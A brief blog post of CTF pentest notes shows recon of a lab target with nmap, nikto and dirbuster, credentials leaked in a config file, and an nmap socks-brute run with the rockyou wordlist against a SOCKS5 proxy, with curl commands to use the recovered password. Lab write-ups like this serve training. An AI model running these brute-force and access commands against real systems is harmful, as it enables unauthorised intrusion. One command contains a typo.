Post

Base CTF Recipe

Posted
duffle bag for pentest
duffle bag for pentest
By Erika 1 min read

duffle bag for pen test

Raw Notes

Desktop View Raw Notes 1

Recon

nmap scan reveals two open ports

PortStatusInfo
80openhttp (web application)
1080opensocks (socks5 proxy requiring authentication)
  • nikto -h [ip address]

reveals more about the web application such as the version

  • dirbuster [web application] need to use the seclist /big.txt

–> webapp.local/adminpanel –> webapp.local/config.txt

this config.txt reveals username: prime password: temppassword

  • curl -x socks5://Prime:temppassword@[ipaddress]:1080/ http://[webapp.local]
  • echo “Prime” > “user.txt”

nmap

Attempt nmap-scripts bruteforce when this curl temporary password doesn’t work

  • nmap –script socks-brute –sript-args userdb=./user.txt, passdb=/usr/share/seclists/Passwords/LeakedDictionaries/rockyou.txt -p 1080 [ipaddress] -v

–> port State Service 1080/tcp open Socks

| socks-brute accounts: Prime:tinkerbell1

curl again

  • curl -x socks5://Prime:tinkerbell1@[ipaddress]:1080/ http://[webapp.local]
tech
tech ctf red team pentesting
This post is licensed under CC BY 4.0 by the author.